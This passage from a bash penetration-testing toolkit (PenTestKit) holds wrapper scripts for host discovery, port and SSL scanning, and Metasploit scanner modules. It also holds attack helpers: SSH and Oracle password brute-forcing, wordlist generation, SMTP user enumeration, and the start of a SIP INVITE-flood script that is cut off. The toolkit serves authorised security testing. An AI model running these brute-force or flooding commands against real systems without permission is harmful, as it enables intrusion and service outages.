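25 | # Runs patator's ssh_login module, reading candidate passwords from
26 | # <password-file> (FILE0). Arguments are quoted so a path or user name
27 | # containing spaces is passed as one value.
28 | # Wrong argument count: message on stderr, exit status 1.
29 | if [[ $# -eq 3 ]]; then
30 |   patator ssh_login host="$1" user="$2" password=FILE0 0="$3"
31 | else
32 |   echo "Please provide a target host, a username and a password list." >&2
33 |   exit 1
34 | fi
35 |
--------------------------------------------------------------------------------
/grep/grep-unique-live-hosts.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 | # Usage: grep-unique-live-hosts.sh <dir>
25 | # Prints the unique addresses marked 'Status: Up' in the nmap greppable
26 | # (*.gnmap) files directly under <dir>, version-sorted.
27 | # grep reads the files itself (-h drops the file-name prefix) and the
28 | # directory is quoted so a path with spaces still globs correctly.
29 | # Wrong argument count: message on stderr, exit status 1.
30 | if [[ $# -eq 1 ]]; then
31 |   grep -h -- 'Status: Up' "$1"/*.gnmap | cut -d ' ' -f2 | sort -V | uniq
32 | else
33 |   echo "Please provide a directory path." >&2
34 |   exit 1
35 | fi
36 |
--------------------------------------------------------------------------------
/oracle/odat-tnspoison.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.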
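#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# For more see the file 'LICENSE' for copying permission.


# Runs ODAT's tnspoison module with --test-module against an Oracle listener.
# $1 == target host, $2 == port, $3 == value for odat's -d option (the SID)
# odat.py is resolved relative to the current directory, so the script has to
# be started from the ODAT checkout.
# Three arguments are required: the command reads $3, and with only two the
# -d option would be left without a value.
if [ $# -eq 3 ]; then
  python3 odat.py tnspoison -s "$1" -p "$2" -d "$3" --test-module
else
  echo "Please provide the target host, port and SID." >&2
  exit 1
fi

--------------------------------------------------------------------------------
/web/banner-grabbing-curl-http-proxy.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.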
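#
# For more see the file 'LICENSE' for copying permission.


# Sends an HTTP HEAD request through a proxy and prints the response headers.
# $1 == proxy server, $2 == target host
# Two arguments are required because the command reads both $1 and $2.
# --insecure turns off TLS certificate validation for the request.
if [ $# -eq 2 ]; then
  curl -I -i -X HEAD -x "$1" --insecure "$2"
else
  echo "Please provide a proxy server and a target host." >&2
  exit 1
fi

--------------------------------------------------------------------------------
/web/banner-grabbing-nmap-built-in.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# For more see the file 'LICENSE' for copying permission.


# Runs nmap service/version detection (-sV, intensity 5) on the given ports.
# $1 == target host, $2 == port list in nmap's -p syntax
if [ $# -eq 2 ]; then
  nmap -sV --version-intensity 5 "$1" -p"$2"
else
  echo "Please provide a target host and a list of ports." >&2
  exit 1
fi

--------------------------------------------------------------------------------
/oracle/oracle-tnscmd-ping.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.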
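#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# For more see the file 'LICENSE' for copying permission.


# Sends a tnscmd10g "ping" to an Oracle listener and keeps a copy of the
# output in the current directory.
# $1 == target host, $2 == port
if [ $# -eq 2 ]; then
  # The log name embeds both arguments verbatim, so a host value containing
  # '/' would change where tee writes.
  tnscmd10g ping -h "$1" -p "$2" 2>&1 | tee "oracle_tnscmd_ping_${1}_${2}.txt"
else
  echo "Please provide the target host and port." >&2
  exit 1
fi

--------------------------------------------------------------------------------
/web/nuclei-scan.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2025 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.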
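#
# For more see the file 'LICENSE' for copying permission.


# Runs nuclei against one target, exporting findings as markdown and copying
# the console output to a file.
# $1 == target, $2 == markdown export directory, $3 == export filename
if [ $# -eq 3 ]; then
  # The export directory is quoted so a path with spaces stays one argument.
  # The pipeline's status is tee's, not nuclei's.
  nuclei -u "$1" -markdown-export "$2" | tee "$3"
else
  echo "Please provide the target, the markdown export directory and the export filename." >&2
  exit 1
fi

--------------------------------------------------------------------------------
/cracking/crunch-pattern.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# For more see the file 'LICENSE' for copying permission.

# Generates a wordlist with crunch from a pattern (-t) and writes it to
# crunch-wordlist-<min>-<max>.txt in the current directory.
# $1 == minimum length, $2 == maximum length, $3 == crunch pattern
if [ $# -eq 3 ]; then
  # The pattern is quoted so the shell passes it to crunch unmodified.
  crunch "$1" "$2" -t "$3" -o "crunch-wordlist-$1-$2.txt"
else
  # The third argument feeds -t, so the message asks for a pattern.
  echo "Please provide minimum password length, maximum password length and pattern." >&2
  exit 1
fi

--------------------------------------------------------------------------------
/oracle/oracle-tnscmd-version.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# For more see the file 'LICENSE' for copying permission.


# Sends a tnscmd10g "version" request to an Oracle listener and keeps a copy
# of the output in the current directory.
# $1 == target host, $2 == port
if [ $# -eq 2 ]; then
  tnscmd10g version -h "$1" -p "$2" 2>&1 | tee "oracle_tnscmd_version_${1}_${2}.txt"
else
  echo "Please provide the target host and port." >&2
  exit 1
fi

--------------------------------------------------------------------------------
/grep/grep-unique-live-hosts-having-more-than-one-port-open.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2021 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.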
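#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# For more see the file 'LICENSE' for copying permission.

# Prints the unique hosts whose .gnmap line contains "open" at least twice.
# $1 == directory holding the .gnmap files
if [ $# -eq 1 ]; then
  # grep reads the files directly; -h drops the file-name prefix and "--"
  # keeps a directory name that starts with '-' from being read as an option.
  grep -h "open.*open" -- "$1"/*.gnmap | cut -d ' ' -f2 | sort -V | uniq
else
  echo "Please provide a directory path." >&2
  exit 1
fi

--------------------------------------------------------------------------------
/web/curl-trace.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.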
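#
# For more see the file 'LICENSE' for copying permission.

# Sends an HTTP TRACE request directly to the target (no proxy is used) and
# prints the response headers.
# e.g. $1 == target url
# A server that answers TRACE successfully has the method enabled; it is
# normally switched off in the web server configuration.
if [ $# -eq 1 ]; then
  curl -i -I -X TRACE --insecure "$1"
else
  echo "Please provide a target host." >&2
  exit 1
fi

--------------------------------------------------------------------------------
/live-hosts/ping-from-linux.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2023 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# For more see the file 'LICENSE' for copying permission.


# Pings hosts .1 to .254 of a /24 once each and prints the replies.
# $1 == first three octets of the range, e.g. 10.10.0
if [ $# -eq 1 ]; then
  # Each ping runs in its own backgrounded subshell, so replies are printed
  # as they arrive and may show up after the script itself has returned.
  for i in {1..254}; do
    (ping -c 1 "$1.$i" | grep "bytes from" &)
  done
else
  echo "Please provide part of the ip range e.g. 10.10.0." >&2
  exit 1
fi




--------------------------------------------------------------------------------
/port-scanning/tcp/full/tcp-ports-scan-full-delay-nc.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# For more see the file 'LICENSE' for copying permission.

# Probes TCP ports 1-65535 on the target with nc in zero-I/O mode (-z).
# $1 == target, $2 == seconds passed to nc -w
# NOTE(review): the usage text calls $2 a scan delay, but -w is nc's timeout
# in the common nc variants, where the interval option is -i - confirm which
# one is intended.
if [ $# -eq 2 ]; then
  nc -w "$2" -z -v "$1" 1-65535
else
  echo "Please provide the target IP address or an IP range and the scan delay time(seconds)." >&2
  exit 1
fi

--------------------------------------------------------------------------------
/cracking/anonymous-ftp.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.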
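#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# For more see the file 'LICENSE' for copying permission.

# Runs Metasploit's auxiliary/scanner/ftp/anonymous module against one target
# by feeding msfconsole a resource script on stdin.
# $1 == target ftp server
# $1 is expanded inside the here-document, so it becomes part of the resource
# script: a value containing a newline would add console commands.
if [ $# -eq 1 ]; then
  msfconsole -n -q -r - << EOF
use auxiliary/scanner/ftp/anonymous
set RHOSTS $1
run
exit
EOF
else
  echo "Please provide the target ftp server." >&2
  exit 1
fi

--------------------------------------------------------------------------------
/grep/grep-unique-live-hosts-comma.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2019 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.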
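#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# For more see the file 'LICENSE' for copying permission.

# Prints the unique hosts reported as up in the *.gnmap files of a directory
# as one comma-separated line.
# $1 == directory holding the .gnmap files
if [ $# -eq 1 ]; then
  # tr joins the list with commas, sed drops the trailing one, and the bare
  # echo supplies the final newline.
  grep -h 'Status: Up' -- "$1"/*.gnmap | cut -d ' ' -f2 | sort -V | uniq | tr '\n' ',' | sed 's/,$//g'
  echo
else
  echo "Please provide a directory path." >&2
  exit 1
fi

--------------------------------------------------------------------------------
/oracle/odat-passwordguesser.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# For more see the file 'LICENSE' for copying permission.


# Runs ODAT's passwordguesser module with the account list shipped at
# accounts/accounts_multiple.txt.
# $1 == target host, $2 == port, $3 == value for odat's -d option (the SID)
# odat.py and the accounts file are resolved relative to the current
# directory, so the script has to be started from the ODAT checkout.
# Three arguments are required: the command reads $3, and with only two the
# -d option would be left without a value.
if [ $# -eq 3 ]; then
  python3 odat.py passwordguesser -s "$1" -p "$2" -d "$3" --accounts-file accounts/accounts_multiple.txt
else
  echo "Please provide the target host, port and SID." >&2
  exit 1
fi

--------------------------------------------------------------------------------
/ssl/ssl-scan.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# For more see the file 'LICENSE' for copying permission.

# Runs sslscan against host:port, writing an XML report and a copy of the
# console output to the current directory.
# $1 == target ip address, $2 == port
if [ $# -eq 2 ]; then
  # Both output names embed the arguments verbatim; they are quoted so the
  # shell neither splits nor globs them.
  sslscan --show-certificate --verbose --no-colour --xml="sslscan_${1}_${2}.xml" "$1:$2" 2>&1 | tee "${1}_${2}_sslscan.txt"
else
  echo "Please provide the target ip address and the port." >&2
  exit 1
fi

--------------------------------------------------------------------------------
/cracking/open-relay-smtp.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.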
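#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# For more see the file 'LICENSE' for copying permission.

# Runs Metasploit's auxiliary/scanner/smtp/smtp_relay module against one
# target by feeding msfconsole a resource script on stdin.
# $1 == target SMTP server
# $1 is expanded inside the here-document, so it becomes part of the resource
# script: a value containing a newline would add console commands.
if [ $# -eq 1 ]; then
  msfconsole -n -q -r - << EOF
use auxiliary/scanner/smtp/smtp_relay
set RHOSTS $1
run
exit
EOF
else
  echo "Please provide the target SMTP server." >&2
  exit 1
fi

--------------------------------------------------------------------------------
/reconnaissance/webrecon.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.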
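#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# For more see the file 'LICENSE' for copying permission.


# Runs web-reconnaissance.py against a URL, converts its log to HTML with
# pandoc and opens the result with xdg-open.
# $1 == target url, $2 == filepath to save logs
# NOTE(review): the log is built from the target's responses; if it can hold
# raw HTML, pandoc may carry it into the page opened in the local browser -
# confirm how web-reconnaissance.py escapes its output.
if [ $# -eq 2 ]; then
  # Paths are quoted so a log path with spaces stays one argument at each step.
  python web-reconnaissance.py -u "$1" -o "$2"
  pandoc -s -o "$2.html" "$2"
  xdg-open "$2.html"
else
  echo "Please provide the target url and a filepath to save logs." >&2
  exit 1
fi

--------------------------------------------------------------------------------
/snmp/scan.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# For more see the file 'LICENSE' for copying permission.


# Runs onesixtyone with the SecLists community-string list against one host
# and keeps a copy of the output in the current directory.
# $1 == target host
if [ $# -eq 1 ]; then
  onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt -dd "$1" 2>&1 | tee "snmp_onesixtyone_${1}.txt"
else
  echo "Please provide a target host." >&2
  exit 1
fi

--------------------------------------------------------------------------------
/cracking/crunch-charset.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# For more see the file 'LICENSE' for copying permission.

# Generates a wordlist with crunch using a named charset from
# /usr/share/crunch/charset.lst and writes it to
# crunch-wordlist-<min>-<max>-<charset>.txt in the current directory.
# $1 == minimum length, $2 == maximum length, $3 == charset name
if [ $# -eq 3 ]; then
  crunch "$1" "$2" -f /usr/share/crunch/charset.lst "$3" -o "crunch-wordlist-$1-$2-$3.txt"
else
  echo "Please provide minimum password length, maximum password length and charset string." >&2
  exit 1
fi

--------------------------------------------------------------------------------
/cracking/smtp-users-enumeration.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.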
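#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# For more see the file 'LICENSE' for copying permission.

# Runs Metasploit's auxiliary/scanner/smtp/smtp_enum module against one
# target by feeding msfconsole a resource script on stdin.
# $1 == target SMTP server
# $1 is expanded inside the here-document, so it becomes part of the resource
# script: a value containing a newline would add console commands.
if [ $# -eq 1 ]; then
  msfconsole -n -q -r - << EOF
use auxiliary/scanner/smtp/smtp_enum
set RHOSTS $1
run
exit
EOF
else
  echo "Please provide the target SMTP server." >&2
  exit 1
fi

--------------------------------------------------------------------------------
/grep/grep-unique-open-ports.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.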
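#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# For more see the file 'LICENSE' for copying permission.

# Prints the unique open port numbers found in the *.gnmap files of a
# directory, sorted numerically.
# $1 == directory holding the .gnmap files
if [ $# -eq 1 ]; then
  # Keeps the "Ports:" lines, splits the port entries onto separate lines,
  # keeps only entries marked /open and strips everything after the number.
  grep -h "Ports:" -- "$1"/*.gnmap | cut -d' ' -f4- | tr ',' '\n' | sed -n -e 's/\/open.*//p' | sed -e 's/^[ \t]*//' | sort -n | uniq
else
  echo "Please provide a directory path." >&2
  exit 1
fi

--------------------------------------------------------------------------------
/reconnaissance/ftp-banner.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# For more see the file 'LICENSE' for copying permission.


# Runs Metasploit's auxiliary/scanner/ftp/ftp_version module against one
# target by feeding msfconsole a resource script on stdin.
# $1 == target ftp server
# $1 is expanded inside the here-document, so it becomes part of the resource
# script: a value containing a newline would add console commands.
if [ $# -eq 1 ]; then
  msfconsole -n -q -r - << EOF
use auxiliary/scanner/ftp/ftp_version
set RHOSTS $1
run
exit
EOF
else
  echo "Please provide the target ftp server." >&2
  exit 1
fi

--------------------------------------------------------------------------------
/reconnaissance/smtp-banner.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# For more see the file 'LICENSE' for copying permission.


# Runs Metasploit's auxiliary/scanner/smtp/smtp_version module against one
# target by feeding msfconsole a resource script on stdin.
# $1 == target smtp server
# $1 is expanded inside the here-document, so it becomes part of the resource
# script: a value containing a newline would add console commands.
if [ $# -eq 1 ]; then
  msfconsole -n -q -r - << EOF
use auxiliary/scanner/smtp/smtp_version
set RHOSTS $1
run
exit
EOF
else
  echo "Please provide the target smtp server." >&2
  exit 1
fi

--------------------------------------------------------------------------------
/sip/sip-dos.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.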
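#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# For more see the file 'LICENSE' for copying permission.


# Runs svwar with the INVITE method and then inviteflood with a request count
# of 1000000000 against a SIP host; inviteflood is started through sudo.
# $1 == target host, $2 == network interface, $3 == internal phone number,
# $4 == alias
# On the receiving side this appears as a sustained stream of INVITE requests
# from a single source, which per-source rate limits on the SIP proxy or SBC
# are meant to absorb.
if [ $# -eq 4 ]; then
  # Arguments are quoted so each one reaches the tools as a single word.
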